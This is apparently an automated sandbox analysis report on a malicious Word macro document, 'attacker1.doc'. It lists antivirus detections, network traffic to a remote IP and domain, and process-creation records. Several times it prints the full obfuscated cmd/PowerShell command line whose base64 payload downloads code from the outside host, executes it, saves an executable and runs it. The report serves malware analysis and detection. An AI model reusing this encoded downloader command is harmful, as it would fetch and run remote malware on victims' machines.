JABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=, CommandLine: POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUA

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: attacker1.docVirustotal: Detection: 57%Perma Link
      Source: attacker1.docReversingLabs: Detection: 53%
      Antivirus / Scanner detection for submitted sampleShow sources
      Source: attacker1.docAvira: detected
      Multi AV Scanner detection for domain / URLShow sources
      Source: http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gasVirustotal: Detection: 16%Perma Link
      Antivirus detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMPAvira: detection malicious, Label: HEUR/Macro.Downloader.MRPU.Gen
      Machine Learning detection for sampleShow sources
      Source: attacker1.docJoe Sandbox ML: detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: :\Windows\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\mscorlib.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: :\Windows\dll\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb=C:\ source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: ws\System.pdbpdbtem.pdbb) source: powershell.exe, 00000004.00000002.403657239.0000000002BE4000.00000004.00000040.sdmp
      Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbamDa source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: >ystem.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: ws\symbols\dll\System.pdbc5 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: System.pdb2 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb:\Pr source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: ??\C:\Windows\System.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.406637790.000000001B4B0000.00000004.00000001.sdmp
      Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: System.pdb8 source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.403660954.0000000002BE7000.00000004.00000040.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe
      Source: global trafficDNS query: name: fpetraardella.band
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 176.32.35.16:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 176.32.35.16:80
      Source: global trafficHTTP traffic detected: GET /704e.php HTTP/1.1Host: 176.32.35.16Connection: Keep-Alive
      Source: unknownDNS traffic detected: query: fpetraardella.band replaycode: Name error (3)
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Fri, 12 Nov 2021 19:55:02 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
      Source: unknownTCP traffic detected without corresponding DNS query: 176.32.35.16
      Source: unknownTCP traffic detected without corresponding DNS query: 176.32.35.16
      Source: unknownTCP traffic detected without corresponding DNS query: 176.32.35.16
      Source: unknownTCP traffic detected without corresponding DNS query: 176.32.35.16
      Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmpString found in binary or memory: http://176.32.35
      Source: powershell.exe, 00000004.00000002.405302772.0000000003867000.00000004.00000001.sdmpString found in binary or memory: http://176.32.35.16
      Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmpString found in binary or memory: http://176.32.35.16/704e.php
      Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmpString found in binary or memory: http://176.32.35.16/704e.phpPE
      Source: powershell.exe, 00000004.00000002.405302772.0000000003867000.00000004.00000001.sdmpString found in binary or memory: http://fpetraardella.band
      Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmpString found in binary or memory: http://fpetraardella.band/xap_10
      Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.406785690.000000001B54F000.00000004.00000001.sdmpString found in binary or memory: http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gas
      Source: powershell.exe, 00000004.00000002.405049147.0000000003667000.00000004.00000001.sdmpString found in binary or memory: http://fpetraardella.band/xap_102b-AZ1/704e.php?l=litten4.gasPE
      Source: powershell.exe, 00000004.00000002.403229716.00000000024A0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: cmd.exe, 00000002.00000002.408500730.0000000001BD0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: powershell.exe, 00000004.00000002.403229716.00000000024A0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: powershell.exe, 00000004.00000002.402979711.0000000000490000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: powershell.exe, 00000004.00000002.402979711.0000000000490000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A519487F-70CA-4082-9E8E-8709DA5961D7}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: fpetraardella.band
      Source: global trafficHTTP traffic detected: GET /704e.php HTTP/1.1Host: 176.32.35.16Connection: Keep-Alive

      E-Banking Fraud:

      barindex
      Malicious encrypted Powershell command line foundShow sources
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgAuAFMAaABlAGwAbABFAHgAZQBjAHUAdABlACgAJABwAGEAdABoACwAJABuAHUAbAAsACAAJABuAHUAbAAsACAAJABuAHUAbAAsADAAKQANAAoADQAKACAAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKACAAIAAgACAAIAANAAoAIAAgAH0ADQAKAH0ADQAKAA0ACgBFAHgAaQB0ADsADQAKAA0ACgA=Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand JABpAG4AcwB0AGEAbgBjAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACIAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACIAKQA7AA0ACgAkAG0AZQB0AGgAbwBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AF0ALgBHAGUAdABNAGUAdABoAG8AZABzACgAKQA7AA0ACgBmAG8AcgBlAGEAYwBoACgAJABtACAAaQBuACAAJABtAGUAdABoAG8AZAApAHsADQAKAA0ACgAgACAAaQBmACgAJABtAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAIgApAHsADQAKACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AMQA3ADYALgAzADIALgAzADUALgAxADYALwA3ADAANABlAC4AcABoAHAAIgApAA0ACgAgACAAIAAgACAASQBFAFgAKAAkAG0ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAoACQAdQByAGkAKQApACkAOwANAAoAIAAgACAAIAB9AGMAYQB0AGMAaAB7AH0ADQAKAA0ACgAgACAAfQANAAoADQAKACAAIABpAGYAKAAkAG0ALgBOAGEAbQBlACAALQBlAHEAIAAiAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACIAKQB7AA0ACgAgACAAIAAgACAAdAByAHkAewANAAoAIAAgACAAIAAgACQAdQByAGkAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AVQByAGkAKAAiAGgAdAB0AHAAOgAvAC8AZgBwAGUAdAByAGEAYQByAGQAZQBsAGwAYQAuAGIAYQBuAGQALwB4AGEAcABfADEAMAAyAGIALQBBAFoAMQAvADcAMAA0AGUALgBwAGgAcAA/AGwAPQBsAGkAdAB0AGUAbgA0AC4AZwBhAHMAIgApAA0ACgAgACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABtAC4ASQBuAHYAbwBrAGUAKAAkAGkAbgBzAHQAYQBuAGMAZQAsACAAKAAkAHUAcgBpACkAKQA7AA0ACgANAAoAIAAgACAAIAAgACQAcABhAHQAaAAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AEcAZQB0AEYAbwBsAGQAZQByAFAAYQB0AGgAKAAiAEMAbwBtAG0AbwBuAEEAcABwAGwAaQBjAGEAdABpAG8AbgBEAGEAdABhACIAKQAgACsAIAAiAFwAXABRAGQAWgBHAFAALgBlAHgAZQAiADsADQAKACAAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoACwAIAAkAHIAZQBzAHAAbwBuAHMAZQApADsADQAKAA0ACgAgACAAIAAgACAAJABjAGwAcwBpAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEcAdQBpAGQAIAAnAEMAMAA4AEEARgBEADkAMAAtAEYAMgBBADEALQAxADEARAAxAC0AOAA0ADUANQAtADAAMABBADAAQwA5ADEARgAzADgAOAAwACcADQAKACAAIAAgACAAIAAkAHQAeQBwAGUAIAA9ACAAWwBUAHkAcABlAF0AOgA6AEcAZQB0AFQAeQBwAGUARgByAG8AbQBDAEwAUwBJAEQAKAAkAGMAbABzAGkAZAApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAgAD0AIABbAEEAYwB0AGkAdgBhAHQAbwByAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoACQAdAB5AHAAZQApAA0ACgAgACAAIAAgACAAJABvAGIAagBlAGMAdAAuAEQAbwBjAHUAbQBlAG4AdAAuAEEAcABwAGwAaQBjAGE